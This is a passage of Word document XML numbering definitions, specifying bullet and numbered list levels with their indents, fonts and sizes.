      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10070" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36214D83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D520BEA4"/>
    <w:lvl w:ilvl="0" w:tplc="0A08384A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E8E2D64A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1704" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="908EFC16">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2424" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6C406DBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4517" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="379840CE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6615" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="93548DBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8712" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F488C1E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10810" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BDECB5E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12907" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BC465CFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15005" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="386E1FBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3162F86"/>
    <w:lvl w:ilvl="0" w:tplc="97204CB8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1119" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="849E24CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2049" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BAC24380">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1420" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E8D254A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1460" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3EDAB704">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="84C032C8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1820" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9F306808">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1840" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="74A67FFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1860" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="99B40E2A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2040" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A66255A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412CAE5A"/>
    <w:lvl w:ilvl="0" w:tplc="46CA1D8E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1130" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="36024A38">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1608" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B260BBE8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1777" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="44"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5A4A3032">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3957" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3B0242E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6135" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AADA20EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8312" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="45762C90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10490" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F95E315A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12667" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CE647E70">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14845" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3DC15AC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EB0F310"/>
    <w:lvl w:ilvl="0" w:tplc="38846C34">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="912" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9400307A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1831" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3000B63A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2352" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="47F26430">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="17F439BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E954DA86">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5166" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E236E78A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7973" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4D16B65E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A192F368">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13586" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45C54E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4290E9B0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2270" w:hanging="812"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2865" w:hanging="686"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4608" w:hanging="989"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5300" w:hanging="516"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4420" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4600" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5300" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8775" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12250" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="49A3325A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4825B30"/>
    <w:lvl w:ilvl="0" w:tplc="B1BC0A02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="980" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2B329674">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2802" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8C668CA4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4624" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="12BAD5C8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6446" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08D0680C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8268" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="17B4D5A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10090" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E8103196">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11912" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="94CE387C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13734" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7244203A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15556" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="69A642D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E8C2630"/>
    <w:lvl w:ilvl="0" w:tplc="77BA88D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1699" w:hanging="970"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="64"/>
        <w:szCs w:val="64"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
